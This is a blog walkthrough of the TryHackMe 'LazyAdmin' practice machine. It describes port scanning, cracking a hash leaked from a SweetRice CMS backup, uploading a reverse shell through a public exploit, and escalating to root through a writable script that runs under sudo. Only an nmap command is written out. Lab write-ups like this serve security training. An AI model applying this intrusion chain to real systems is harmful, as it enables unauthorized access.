TryHackMe LazyAdmin Walkthrough

by Vince
in Blog
Hits: 3356

The description states:  "Easy linux machine to practice your skills" and "Have some fun! There might be multiple ways to get user access."

I thought this was worthy of writing up because you have to chain several pieces together in order to get on the box.  I saw something recently that described the various capture the flag boxes by level.  Based on the description for this box and how I gained my low privilege shell, I would call this easy.5 because it wasn't one step to the next.  The idea of chaining pieces together is more of an intermediate kind of process.  That said, maybe there was an easier avenue that I missed?  Anyway, I really liked the box so let's kick off with Nmap:

With the TryHackMe platform, I've learned to cycle my Nmap scans.  I normally start off with --top-ports 1000, then come in on those ports heavy like:

nmap -sV -sT -O -A -p 22,80

The top ports will give me something to work with and then the follow up will give me details.  When the second scan finishes, I will go with the full -p- to get all of the other ports that our open.  I might follow up with the heavier approach but choose the specific ports.  Seems no matter what the box you're working on, you will end up waiting forever if you do anything other than a basic scan on all ports.  That's fairly real world but not something I've seen in the cyber ranges.  It's fine, you just have to adjust your method.

Moving along...

We find port 80 open, let's take a look:

Fuzzing is also another process where I've adjusted my approach with TryHackMe.  I would normally lead with GoBuster but again, the length of time it takes to complete is too long so I'll work with something smaller and quicker and then circle out to something larger.  We start off with Dirb:

We find /content and we investigate:

Lots of references to something called "SweetRice", I search Exploit-db:

Excellent, what can we do? 

Searching the recommend directory:

We find a .sql backup file, when we dig into it:

I initially made the mistake of thinking the username was admin.  When it didn't work, I came back and I realized the error in my ways.  The username is manager and we have a hash which we can attempt to crack with Hashcat:

Excellent!  We have the password, now we need to find the login.  While all of this was going on, I was trying to wait for the fuzzing scan to complete but I got impatient so I downloaded SweetRice and I attempted to install.  It actually broke on installation but I got the data structure.  I didn't actually know where the admin page lived but I started to input the directories and I instantly found:

We toss in the credentials and we get logged in. 

This is where we introduce our second exploit for this CMS:

We "could" investigate the application or we could just leverage our credentials and use this exploit.  I download it and I try to run it out of the box but it's throwing errors. 

I opt to just hard code my values:

We execute the script:

Excellent -- it claims we've uploaded our shell.  It's just Pentest Monkey's reverse shell, FYI. 

We view the directory as a sanity check:

With our handler setup, we execute our shell:

We clean up the environment and we start looking around:

When we dig into the home directory for "itguy", we find:

The user flag is good but this backup file is intriguing.  We look inside and we follow the trail:

So basically, we have a script that executes another script.  That script appears to have a reverse shell.  And that second script is writable to us. 

It's interesting how we find different styles, no different than in the real world.  In the TryHackMe world, I've encountered a few boxes that give sudo privileges to www-data which is something that I haven't seen prior.  It's definitely not something that I would have checked when I first started playing on this platform but now, I'm accustomed to looking:

Here's where we can tie all of this stuff together for root.  We could attempt to follow suit and echo a reverse shell into that script.  But we can leverage what we've already placed on the system:

We echo the execution of our existing shell and then we execute our sudo command. 

With our handler setup:

We catch our inbound shell, we clean it up, and we're root.